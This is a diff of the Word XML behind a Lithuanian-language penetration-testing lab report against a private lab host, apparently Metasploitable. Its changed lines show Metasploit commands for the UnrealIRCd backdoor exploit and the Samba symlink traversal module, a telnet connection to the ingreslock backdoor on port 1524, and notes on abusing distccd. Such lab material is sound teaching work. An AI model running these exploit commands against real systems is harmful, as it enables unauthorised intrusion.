+                <w:b/>
+                <w:bCs/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t>Atliktas veiksmas</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6210" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t>Rezultatas (paslaugos, prievadai)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
       <w:tr>
         <w:trPr>
           <w:trHeight w:val="327"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="2953" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+            <w:tcW w:w="3240" w:type="dxa"/>
+            <w:tcBorders>
+              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
               <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-            </w:tcBorders>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:lastRenderedPageBreak/>
-              <w:t>use exploit/unix/irc/unreal_ircd_3281_backdoor</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>set RHOST 192.168.</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>177</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>.1</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>28</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>exploit</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="6497" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t>s</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t>mbclient</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t>-L //192.168.177.128</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6210" w:type="dxa"/>
+            <w:tcBorders>
+              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
               <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
             </w:tcBorders>
           </w:tcPr>
           <w:p>
@@ -11162,10 +11649,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64E27CFA" wp14:editId="5FE1625A">
-                  <wp:extent cx="4124325" cy="2006600"/>
-                  <wp:effectExtent l="0" t="0" r="9525" b="0"/>
-                  <wp:docPr id="28" name="Picture 28"/>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F9EC08F" wp14:editId="284E0432">
+                  <wp:extent cx="3999230" cy="1881505"/>
+                  <wp:effectExtent l="0" t="0" r="1270" b="4445"/>
+                  <wp:docPr id="39" name="Picture 39"/>
                   <wp:cNvGraphicFramePr>
                     <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                   </wp:cNvGraphicFramePr>
@@ -11185,7 +11672,7 @@
                         <pic:spPr>
                           <a:xfrm>
                             <a:off x="0" y="0"/>
-                            <a:ext cx="4124325" cy="2006600"/>
+                            <a:ext cx="3999230" cy="1881505"/>
                           </a:xfrm>
                           <a:prstGeom prst="rect">
                             <a:avLst/>
@@ -11206,7 +11693,7 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="2953" w:type="dxa"/>
+            <w:tcW w:w="3240" w:type="dxa"/>
             <w:tcBorders>
               <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
               <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
@@ -11229,13 +11716,13 @@
                 <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:lang w:val="lt-LT"/>
               </w:rPr>
-              <w:t>id</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="6497" w:type="dxa"/>
+              <w:t>msfconsole</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6210" w:type="dxa"/>
             <w:tcBorders>
               <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
               <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
@@ -11258,10 +11745,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B4787F7" wp14:editId="1237D906">
-                  <wp:extent cx="2333625" cy="628650"/>
-                  <wp:effectExtent l="0" t="0" r="9525" b="0"/>
-                  <wp:docPr id="27" name="Picture 27"/>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47571365" wp14:editId="728FE972">
+                  <wp:extent cx="3999230" cy="2696210"/>
+                  <wp:effectExtent l="0" t="0" r="1270" b="8890"/>
+                  <wp:docPr id="40" name="Picture 40"/>
                   <wp:cNvGraphicFramePr>
                     <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                   </wp:cNvGraphicFramePr>
@@ -11281,7 +11768,7 @@
                         <pic:spPr>
                           <a:xfrm>
                             <a:off x="0" y="0"/>
-                            <a:ext cx="2333625" cy="628650"/>
+                            <a:ext cx="3999230" cy="2696210"/>
                           </a:xfrm>
                           <a:prstGeom prst="rect">
                             <a:avLst/>
@@ -11296,285 +11783,67 @@
           </w:p>
         </w:tc>
       </w:tr>
-    </w:tbl>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>Naudoti telnet arba metasploit</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">root@linux:~# </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>msfconsole</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>Daug mažiau subtilus yra senas laukimo (standby) "ingreslock" Backdoor. Ji naudoja 1524 prieigą (port). Ingreslock prieiga buvo labai populiarus pasirinkimas kai prieš dešimtmetį Backdoor diegdavo į serverius. Ją gauti labai paprasta:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc258656092"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>Paslaugos:netyčiniai Backdoors</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="6"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>(galima pateikti darbalaukio atvaizdą)</w:t>
-      </w:r>
-    </w:p>
-    <w:tbl>
-      <w:tblPr>
-        <w:tblW w:w="0" w:type="auto"/>
-        <w:tblInd w:w="1" w:type="dxa"/>
-        <w:tblLayout w:type="fixed"/>
-        <w:tblCellMar>
-          <w:left w:w="0" w:type="dxa"/>
-          <w:right w:w="0" w:type="dxa"/>
-        </w:tblCellMar>
-        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
-      </w:tblPr>
-      <w:tblGrid>
-        <w:gridCol w:w="2953"/>
-        <w:gridCol w:w="6497"/>
-      </w:tblGrid>
-      <w:tr>
-        <w:trPr>
-          <w:trHeight w:val="368"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="2953" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-            </w:tcBorders>
-            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>Atliktas veiksmas</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="6497" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-            </w:tcBorders>
-            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>Rezultatas (paslaugos, prievadai)</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
       <w:tr>
         <w:trPr>
           <w:trHeight w:val="327"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="2953" w:type="dxa"/>
-            <w:tcBorders>
-              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-            </w:tcBorders>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>telnet 192.168.177.128 1524</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="6497" w:type="dxa"/>
-            <w:tcBorders>
-              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-            </w:tcBorders>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
+            <w:tcW w:w="3240" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t>use auxiliary/admin/smb/samba_symlink_traversal</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6210" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:jc w:val="both"/>
               <w:rPr>
                 <w:noProof/>
               </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
               <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A833F3B" wp14:editId="581D9F23">
-                  <wp:extent cx="2476500" cy="809625"/>
-                  <wp:effectExtent l="0" t="0" r="0" b="9525"/>
-                  <wp:docPr id="29" name="Picture 29"/>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DDA7F78" wp14:editId="42590ADE">
+                  <wp:extent cx="3994150" cy="424815"/>
+                  <wp:effectExtent l="0" t="0" r="6350" b="0"/>
+                  <wp:docPr id="41" name="Picture 41"/>
                   <wp:cNvGraphicFramePr>
                     <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                   </wp:cNvGraphicFramePr>
@@ -11594,7 +11863,7 @@
                         <pic:spPr>
                           <a:xfrm>
                             <a:off x="0" y="0"/>
-                            <a:ext cx="2476500" cy="809625"/>
+                            <a:ext cx="3994150" cy="424815"/>
                           </a:xfrm>
                           <a:prstGeom prst="rect">
                             <a:avLst/>
@@ -11611,63 +11880,87 @@
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="327"/>
+          <w:trHeight w:val="377"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="2953" w:type="dxa"/>
-            <w:tcBorders>
-              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-            </w:tcBorders>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>id</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="6497" w:type="dxa"/>
-            <w:tcBorders>
-              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-            </w:tcBorders>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
+            <w:tcW w:w="3240" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
+              <w:t>set RHOST 192.168.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t>177</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t>.1</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t>28</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6210" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:jc w:val="both"/>
               <w:rPr>
                 <w:noProof/>
               </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
               <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FC845AF" wp14:editId="01260F83">
-                  <wp:extent cx="3038475" cy="342900"/>
-                  <wp:effectExtent l="0" t="0" r="9525" b="0"/>
-                  <wp:docPr id="30" name="Picture 30"/>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="796F0840" wp14:editId="339C7CFB">
+                  <wp:extent cx="3994150" cy="205105"/>
+                  <wp:effectExtent l="0" t="0" r="6350" b="4445"/>
+                  <wp:docPr id="42" name="Picture 42"/>
                   <wp:cNvGraphicFramePr>
                     <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                   </wp:cNvGraphicFramePr>
@@ -11687,7 +11980,7 @@
                         <pic:spPr>
                           <a:xfrm>
                             <a:off x="0" y="0"/>
-                            <a:ext cx="3038475" cy="342900"/>
+                            <a:ext cx="3994150" cy="205105"/>
                           </a:xfrm>
                           <a:prstGeom prst="rect">
                             <a:avLst/>
@@ -11702,323 +11995,67 @@
           </w:p>
         </w:tc>
       </w:tr>
-    </w:tbl>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Be žalingų Backdoors yra ir paslaugos kurie pagal savo prigimtį yra pažeidžiami. Pirmasis iš jų yra įdiegtas IP - </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>distccd</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>. Ši programa leidžia lengvai paskirstyti didelį kompiliatoriaus darbą įvairiose sistemos. Šios paslaugos problema yra ta, kad hakeris gali lengvai piktnaudžiauti ją, paleisti komandas su atitinkamais pasirinkimas (raktais).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">root@linux:~# </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>msfconsole</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
